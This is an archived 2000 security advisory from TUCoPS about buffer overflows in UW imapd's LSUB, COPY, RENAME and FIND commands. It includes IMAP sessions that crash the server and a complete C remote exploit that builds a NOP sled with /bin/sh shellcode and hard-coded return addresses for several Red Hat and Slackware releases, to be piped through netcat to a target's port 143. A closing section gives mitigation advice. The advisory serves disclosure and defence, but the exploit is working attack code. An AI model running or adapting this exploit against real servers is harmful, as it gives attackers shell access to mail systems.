Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: lnx613.htm

imapd local root exploit via lsub arg



26th Apr 2000 [SBWID-613]
COMMAND

	    imapd local root exploit via lsub arg

	

	

SYSTEMS AFFECTED

	    imapd4r1 v12.264 (imap-4.7 package from the UW) and older

	

	

PROBLEM

	    Michal Zalewski found following.  Newest RH:

	
	        OK nimue IMAP4rev1 v12.264 server ready

	        1 login lcamtuf test

	        1 OK LOGIN completed

	        1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]

	        Program received signal SIGSEGV, Segmentation fault.

	        0x41414141 in ?? ()

	

	    Privledges seems to be dropped, but, anyway, it's nice way to  get

	    shell access  to mail  account, maybe  grab some  data from memory

	    etc.   It  is  believed  both  imap  and  ipopd packages need code

	    security audit.

	

	    To segfault  the number  of A's  has to  in the  range 1023 < #A >

	    8180.  If the command line including CR/LF is longer than 8192  an

	    error message is  displayed.  The  segfaults are in  the nntp, mh,

	    news  and   dummy  driver.    In   all  modules   the   subroutine

	    <name>_canonicalize  will  happily  strcpy  and  strcat  the  user

	    supplied   arguments   to   fixed   size   buffers  with  normally

	    MAILTMPLEN = 1024 bytes. Older version, imap-4.5-4 seems to be ok.

	

	    Here's another buffer overflow in imapd.  This time security  flaw

	    exist in standard rfc 1064 COPY command:

	
	        OK mail IMAP4rev1 v12.264 server ready

	        login siva9 secret

	        OK LOGIN completed

	        select inbox

	        2 EXISTS

	        0 RECENT

	        OK [UIDVALIDITY 956162550] UID validity status

	        OK [UIDNEXT 5] Predicted next UID

	        FLAGS (Answered Flagged Deleted Draft Seen)

	        OK [PERMANENTFLAGS (* Answered Flagged Deleted Draft Seen)] Permanent

	        flags

	        OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9

	        OK [READ-WRITE] SELECT completed

	        copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]

	

	    No answer.   Process has been  killed by SIGSEGV.   Number of  A's

	    must be in range  from 1017 to 8180.   After LOGIN all  privileges

	    are dropped,  but we  still have  possibility to  get unprivileged

	    shell access.  This was tested against WU imapd v10.223,  v11.241,

	    v12.250, v12.261, and v12.264.

	

	    Here  comes  yet  another  buffer  overrun  (3  ones).   This time

	    affected commands are LSUB, RENAME and FIND:

	
	        OK mail IMAP4rev1 v12.264 server ready

	        login siva9 secret

	        OK LOGIN completed

	        lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

	

	        SIGSEGV received.

	

	        OK localhost IMAP4rev1 v12.264 server ready

	        login siva9 secret

	        OK LOGIN completed

	        rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

	

	        SIGSEGV received.

	

	        OK localhost IMAP4rev1 v12.264 server ready

	        login siva9 secret

	        OK LOGIN completed

	        find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

	

	        SIGSEGV received.

	

	    It seems that all two-argument commands in authenticated state -

	    where second argument is string - are vulnerable.  ipop2/3d works

	    fine in all states, also in transaction state.

	

	 Exploit

	 =======

	

	By tracewar [piola2@bezeqint.net]
	

	/*

	vuln:

	IMAP4rev1(lsub). VERSIONS: 12.264,12.250,11.241,10.223. 

	remote exploit by tracewar.

	i know it's lame because the exploit use netcat, but it works so i don't care..

	*/

	

	#include <stdio.h>

	#include <string.h>

	#include <stdlib.h>

	#define NOP "0x90" /* i love NOPS :} */

	

	char shellcode[] =

	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

	

	int main(int argc, char **argv){

	long retaddr;

	int i,offset;

	char buffer[1064];

	if(argc != 5){ 

	printf("IMAP4rev1(lsub) remote exploit by tracewar.\n");

	printf("usage: %s <username> <password> <type> <offset>|nc remote_ip 143\n",argv[0]);

	printf("Types:\n");

	printf("[1] Red Hat 6.2 - IMAP4rev1 v12.264\n");

	printf("[2] Red Hat 6.1 - IMAP4rev1 v12.250\n");

	printf("[3] Red Hat 6.0 - IMAP4rev1 v12.250\n");

	printf("[4] Red Hat 5.2 - IMAP4rev1 v11.241\n");

	printf("[5] Red Hat 5.1 - IMAP4rev1 v10.223\n");

	printf("[6] Slackware 7.1 - IMAP4rev1 v12.264\n");

	printf("[7] Slackware 7.0 - IMAP4rev1 v12.261\n");

	printf("[8] Slackware 7.0 - IMAP4rev1 v2000.284\n");

	printf("[9] Slackware 4.0 - IMAP4rev1 v12.250\n");

	return(0);}

	

	if(atoi(argv[3]) == 1){retaddr=0xbffff2c8;}

	if(atoi(argv[3]) == 2){retaddr=0xbffff2c4;}

	if(atoi(argv[3]) == 3){retaddr=0xbffff2f0;}

	if(atoi(argv[3]) == 4){retaddr=0xbffff320;}

	if(atoi(argv[3]) == 5){retaddr=0xbffff31c;}

	if(atoi(argv[3]) == 6){retaddr=0xbffff4e0;}

	if(atoi(argv[3]) == 7){retaddr=0xbffff3ec;}

	if(atoi(argv[3]) == 8){retaddr=0xbfffebc8;}

	if(atoi(argv[3]) == 9){retaddr=0xbffff890;}

	

	offset=atoi(argv[4]);

	memset(buffer, 0x90, 1032);

	memcpy(buffer+613, shellcode, strlen(shellcode));

	for(i=strlen(shellcode)+613;i<=1064;i+=4)

	*(long *)&buffer[i] = retaddr - offset;

	printf("1 LOGIN %s %s\r\n", argv[1], argv[2]);

	printf("1 LSUB \"\" {1064}\r\n");

	for(i=0; i<1064; i++) putchar(buffer[i]);

	printf("\r\n");}

	

SOLUTION

	    1) Deinstall the imap-uw  port/package, if you you  have installed

	       it.

	    2) If  you do  not specifically  require imap  functionality (i.e.

	       pop2/pop3  is  sufficient)  then  disable  the  imap  daemon in

	       /etc/inetd.conf  and  restart  inetd  (e.g.  with  the  command

	       'killall -HUP inetd')

	

	    Unfortunately the vulnerabilities in imapd are quite extensive and

	    no patch is  currently available to  address them.   There is also

	    no  "drop-in"  replacement  for  imap-uw  currently  available  in

	    ports, although the mail/cyrus  port is another imap  server which

	    may be a suitable replacement.  Cyrus has different  configuration

	    and operational requirements than imap-uw however, which may  make

	    it unsuitable for many users.

	

	    Until a security audit of the imap-uw source can be completed  and

	    the vulnerabilities patched, it  is recommended that operators  of

	    "closed" imapd servers take steps to minimize the impact of  users

	    being able  to run  code on  the server  (i.e., by  tightening the

	    local security on the machine to minimize the damage an  intruding

	    user can cause).

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH